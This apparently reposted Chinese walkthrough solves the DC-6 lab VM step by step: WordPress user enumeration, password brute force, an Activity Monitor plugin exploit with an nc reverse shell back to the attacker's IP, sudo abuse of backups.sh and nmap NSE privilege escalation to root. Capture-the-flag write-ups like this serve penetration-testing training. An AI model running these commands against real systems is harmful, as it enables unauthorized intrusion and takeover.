日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

DC系列靶机(六)

發布時間:2024/1/1 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 DC系列靶机(六) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

DC系列靶機(六)

  • DC系列靶機(六)
    • 1. 實驗環境
    • 2. 實驗過程
      • 2.1 主機發現
      • 2.2 端口掃描
      • 2.3 滲透測試
      • 2.4 提權

DC系列靶機(六)

1. 實驗環境

Kali Linux:192.168.253.135
DC-6靶機:未知
本地主機:win10

2. 實驗過程

2.1 主機發現

netdiscover -i eth0 -r 192.168.253.0/24


2.2 端口掃描


2.3 滲透測試

訪問web網站,但顯示無法訪問

這里可以在hosts文件中配置

成功訪問網站主頁

由wappalyzer插件可以得到該網站是利用wordpress框架搭建的

利用Dirb工具對網站目錄爆破

可以發現一個登陸頁面

由于該網站是利用wordpress框架搭建的,我們可以利用我WPScan工具對該服務器進行用戶名破解


可以得到五個用戶名,將這五個用戶名寫入DC6users.txt

在vulnhub中有提示:告訴我們把kali自帶字典 rockyou.txt中包含k01字段的密碼導出來生成 一本字典的話會節省很多時間。

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

其中:| 表示用“|”前面輸出的數據給“|”后面命令做處理。
grep 表示用正則表達式匹配數據
> 表示將輸出數據寫入“>”后面文件。

利用WPScan進行暴力破解

這里成功找到一對用戶名和密碼:mark / helpdesk01

利用mark / helpdesk01 這一對用戶名密碼登錄

登錄成功!!
登錄成功后可以發現一個插件Activity Monitor
Activity Monitor允許你從一臺計算機實時監控所有計算機的行動,并紀錄所有計算機過去的使用情況。

嘗試查找Activity Monitor的漏洞

嘗試利用45274.html這個漏洞,因為它是wordpress插件上的漏洞
將其下載到當前目錄

searchsploit -m 45274


查看該漏洞的詳細信息,這里需要對IP地址和端口進行修改:

注意反彈shell的命令

nc 192.168.119.130 1234 -e /bin/bash

在kali上開啟一個http服務

訪問45274.html這個網頁:

點擊Submit request后反彈shell成功 !!!

提升交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'


訪問/home/mark目錄中存放的文件,然后發現一對新的用戶名和密碼:graham / GSo7isUM1D4

切換到graham用戶,查看/home/graham目錄下的文件,但是什么都沒有發現。

2.4 提權

嘗試一下SUID提權:是一種權限類型,允許用戶使用指定用戶的權限執行文件。

sudo -l

-l 顯示出自己(執行 sudo 的用戶)的權限

這里發現graham用戶可以以jens用戶的權限執行backups.sh命令

我們可以將/bin/bash寫入到backups.sh文件中,并以jens用戶的權限執行該命令

echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh


這里成功切換到jens用戶

這里發現jens用戶可以以root權限執行nmap。剛好我們知道nmap是可以用來提權的Linux可執行性文件。
嘗試利用namp來進行提權

這里提示我們文件必須以.nse為后綴

echo 'os.execute("/bin/sh")' > getshell.nse sudo nmap --script=getshell.nse

linux中 > 表示覆蓋原文件內容(文件的日期也會自動更新),>> 表示追加內容(會另起一行,文件的日期也會自動更新)。

這里成功提權 !!!

成功得到flag !!!

總結

以上是生活随笔為你收集整理的DC系列靶机(六)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。